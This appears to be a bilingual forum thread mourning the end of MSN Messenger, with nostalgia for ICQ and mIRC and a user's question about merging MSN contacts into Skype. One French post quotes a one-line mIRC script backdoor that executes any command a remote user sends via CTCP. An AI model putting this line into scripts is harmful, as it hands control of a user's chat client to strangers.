RIP MSN Messenger :(

I'm oldschool yo

460px-ICQ.svg.png

good riddance! i never really liked msn, used Yahoo messenger as my primary messenger app until a couple years ago when I got unlimited text on my cell and stopped using any messengers.

ICQ... Wow... Brings back some good memories!

mIRC and MSN also bring back some crazy stuff.. maaaaan.. I wish I could go back in time!

Well I'm really sad to see it go as I've been connecting to MSN daily for years and years however my list has shrunk to the point where I usually only see 2-3 people online per day and really only speak to 1 regularly.

I don't think I will upgrade to skype as I'm not interested in a phoning webcam service type thing. I just wanna message people so I might go back to ICQ!

Need help ... was trying to change to skype and it won't let me merge my accounts ...

On the screen that said log in with MSN/hotmail, I enter my email/password, click ok but the screen that say merge with existing Skype account doesn't appear ....

Try also to create a contact files with MSN, but Skype doesn't read .csv files

help I want my facking MSN contact in my Skype

Lorsque mIRC était à la mode, j'avais mon script!! Hahaha...du bon vieux "C".

En plus du bon vieux backdoor:
Code:
ctcp ^*:DO:*:{ . $+ $2- | .halt }

Une méchante gang de noobs l'avaient !

Need help ... was trying to change to skype and it won't let me merge my accounts ...

On the screen that said log in with MSN/hotmail, I enter my email/password, click ok but the screen that say merge with existing Skype account doesn't appear ....

Try also to create a contact files with MSN, but Skype doesn't read .csv files

help I want my facking MSN contact in my Skype

Peut-être que ton compte n'a pas encore été migré. Attends de recevoir le email.

Back